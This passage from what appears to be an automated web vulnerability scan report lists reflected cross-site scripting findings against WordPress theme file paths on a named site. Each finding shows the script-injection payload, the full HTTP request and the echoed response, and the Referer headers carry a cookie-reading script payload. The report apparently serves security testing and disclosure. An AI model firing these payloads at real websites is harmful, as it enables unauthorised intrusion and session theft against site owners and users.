<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentd9c52\"><script>alert(1)</script>3d0d69d4637/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.251. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d2f"><script>alert(1)</script>d565439d74f was submitted in the REST URL parameter 2. This input was echoed as 88d2f\"><script>alert(1)</script>d565439d74f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes88d2f"><script>alert(1)</script>d565439d74f/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes88d2f\"><script>alert(1)</script>d565439d74f/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.252. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a12"><script>alert(1)</script>dea25148c67 was submitted in the REST URL parameter 3. This input was echoed as 32a12\"><script>alert(1)</script>dea25148c67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp32a12"><script>alert(1)</script>dea25148c67/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp32a12\"><script>alert(1)</script>dea25148c67/js/rokbox/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.253. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bef"><script>alert(1)</script>bfc1c1fb213 was submitted in the REST URL parameter 4. This input was echoed as 59bef\"><script>alert(1)</script>bfc1c1fb213 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js59bef"><script>alert(1)</script>bfc1c1fb213/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:32 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js59bef\"><script>alert(1)</script>bfc1c1fb213/rokbox/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.254. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eee2d"><script>alert(1)</script>3bc1486545 was submitted in the REST URL parameter 5. This input was echoed as eee2d\"><script>alert(1)</script>3bc1486545 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokboxeee2d"><script>alert(1)</script>3bc1486545/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:44 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokboxeee2d\"><script>alert(1)</script>3bc1486545/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.255. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91e42"><script>alert(1)</script>e91bd0015f3 was submitted in the REST URL parameter 6. This input was echoed as 91e42\"><script>alert(1)</script>e91bd0015f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes91e42"><script>alert(1)</script>e91bd0015f3/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:56 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes91e42\"><script>alert(1)</script>e91bd0015f3/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.256. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b9db"><script>alert(1)</script>78d8e5b2272 was submitted in the REST URL parameter 7. This input was echoed as 4b9db\"><script>alert(1)</script>78d8e5b2272 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4b9db"><script>alert(1)</script>78d8e5b2272/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4b9db\"><script>alert(1)</script>78d8e5b2272/rokbox-style.css" type="hidden" />
...[SNIP]...

1.257. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1817"><script>alert(1)</script>b8a0679b498 was submitted in the REST URL parameter 8. This input was echoed as c1817\"><script>alert(1)</script>b8a0679b498 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.cssc1817"><script>alert(1)</script>b8a0679b498 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.cssc1817\"><script>alert(1)</script>b8a0679b498" type="hidden" />
...[SNIP]...

1.258. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12eeb"><script>alert(1)</script>7d3af0019f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12eeb\"><script>alert(1)</script>7d3af0019f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css?12eeb"><script>alert(1)</script>7d3af0019f8=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css?12eeb\"><script>alert(1)</script>7d3af0019f8=1" type="hidden" />
...[SNIP]...

1.259. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da186"><script>alert(1)</script>71a56d9e553 was submitted in the REST URL parameter 1. This input was echoed as da186\"><script>alert(1)</script>71a56d9e553 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentda186"><script>alert(1)</script>71a56d9e553/themes/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentda186\"><script>alert(1)</script>71a56d9e553/themes/rt_mynxx_wp/js/rokmoomenu.js" type="hidden" />
...[SNIP]...

1.260. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e18d1"><script>alert(1)</script>7f62ea5354e was submitted in the REST URL parameter 2. This input was echoed as e18d1\"><script>alert(1)</script>7f62ea5354e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themese18d1"><script>alert(1)</script>7f62ea5354e/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themese18d1\"><script>alert(1)</script>7f62ea5354e/rt_mynxx_wp/js/rokmoomenu.js" type="hidden" />
...[SNIP]...

1.261. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cca"><script>alert(1)</script>e5cef24f8c9 was submitted in the REST URL parameter 3. This input was echoed as 95cca\"><script>alert(1)</script>e5cef24f8c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp95cca"><script>alert(1)</script>e5cef24f8c9/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp95cca\"><script>alert(1)</script>e5cef24f8c9/js/rokmoomenu.js" type="hidden" />
...[SNIP]...

1.262. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fe6b"><script>alert(1)</script>4303ea7f066 was submitted in the REST URL parameter 4. This input was echoed as 5fe6b\"><script>alert(1)</script>4303ea7f066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js5fe6b"><script>alert(1)</script>4303ea7f066/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:32 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
